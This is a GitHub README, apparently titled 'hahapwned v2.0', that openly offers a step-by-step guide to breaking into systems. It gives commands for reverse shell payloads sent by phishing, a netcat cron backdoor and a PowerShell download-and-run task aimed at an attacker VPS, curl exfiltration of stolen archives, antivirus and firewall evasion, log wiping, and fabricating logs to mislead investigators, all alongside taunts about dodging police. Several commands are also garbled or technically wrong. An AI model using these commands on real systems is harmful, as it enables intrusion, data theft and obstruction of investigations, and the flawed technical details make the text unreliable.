Skip to content

fraudmailer/Fraud

Repository files navigation

🚨 hahapwned v2.0 🚨

Fuck the law, Fuck the feds, and Fuck your conscience.

🛠️ Tools Needed

1 Kali Linux (or any pentesting OS). 2 TOR (The Onion Router) for anonymity. 3 Metasploit Framework (for exploitation). 4 Netcat (nc) for reverse shells. 5 Nmap for port scanning. 6 Ghidra (reverse engineering). 7 Wireshark for packet analysis. 8 Python 3.10+ (exploit scripts). 9 Disguised VPS (AWS/DigitalOcean with burner email). 10 Burner phone for SMS 2FA bypass.


🧠 Exploitation Techniques

Step 1: Clone the Repo

git clone https://github.com/hahapwned/Fraud cd hahapwned pip install -r requirements.txt

Step 2: Recon

Scan the target:

nmap -sV -T4 --script=vuln http://example.com

Use DNS tools like dig or nslookup to find subdomains:

dig @8.8.8.8 example.com ANY

Step 3: Weaponize

Generate a reverse shell payload with Metasploit:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_vps_ip LPORT=443 -f exe -o exploit.exe

Upload the payload to the target using a phishing link (e.g., fake PDF):

python3 phishing_email_sender.py --target user@target.org --attachment exploit.exe

Step 4: Execute

Run the exploit through TOR to ghost the pigs:

tor --run python3 exploit.py --target http://example.com --proxy tor

Step 5: Cover Your Tracks

Delete logs and traces:

rm -rf /var/log/* /tmp/* /dev/shm/*

Wipe Metasploit logs (if installed):

rm -rf ~/.msf4

Kill running processes:

killall -9 python3 metasploit nmap

Use chattr +i to hide files (Linux):

chattr +i /path/to/file


🕵️ Post-Exploitation

Maintain Access

Set up a persistent backdoor:

echo 'nc -zv your_vps_ip 443 -e /bin/bash' >> /etc/cron.d/backdoor

Use PowerShell for Windows persistence:

schtasks /create /tn "UpdateTask" /tr "powershell.exe -c 'IEX (New-Object Net.WebClient).DownloadString(''http://your_vps_ip/payload.ps1'')" /sc daily

Exfiltrate Data

Steal files silently:

tar -czvf /tmp/data.tar.gz /path/to/steal && curl -X POST --data-binary @/tmp/data.tar.gz http://your_vps_ip/upload

Use DNS tunneling to bypass firewalls:

dns2tcp -s your_vps_ip -d example.com --data /path/to/steal


🕵️ Bypassing Security Tools

Bypass Antivirus

1 Obfuscate code with PyArmor or CPython:

pyarmor obfuscate exploit.py

2 Use XOR encryption on payloads. 3 Sign malicious DLLs with stolen certificates (Google it).

Bypass Firewalls

1 Use HTTP tunnelling (e.g., reGeorg):

python3 reGeorg.py --target http://example.com/ --lhost your_vps_ip

2 Masquerade as legit traffic (e.g., mimic legit_corp_traffic.exe):

curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" http://example.com/exploit

🕵️ Covering Tracks

Delete Command History

history -c rm ~/.bash_history

Spoof MAC Addresses

macchanger -r eth0

Spoof DNS Queries

dig @8.8.8.8 example.com ANY +dnssec || dig @1.1.1.1 example.com ANY

Use Tor Bridges

tor --run --bridges "obfs4 127.0.0.1:9040 cert=..."

Fake Logs

Generate fake logs to confuse investigators:

for i in {1..1000}; do echo "fake_login $((RANDOM % 1000))" >> /var/log/fake.log; done


🛡️ Optional: Social Engineering

1 Fake phishing emails:

msfconsole -q -x "use exploit/multi/script/web_delivery; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST
your_vps_ip; set LPORT 443; exploit"

2 Impersonate IT support via LinkedIn. 3 Use Discord bots to spread malware in private servers.


🚨 Legal Disclaimers (Read This, B**ch)

1 This software is 100% illegal. Use at your own risk. 2 If caught: • Claim it was a rogue employee. • Blame it on a "hacking group" with a fake name. • F*** the cops—they’ll never find you. 3 Warranty: • No refunds. • No support. • If it crashes a nuclear plant, it’s your problem.


🧨 Credits

• [OG CARE] for this masterpiece. • [OG CARE] for funding this chaos. • [The Fuckiing Feds] for being stupid as hell.


About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors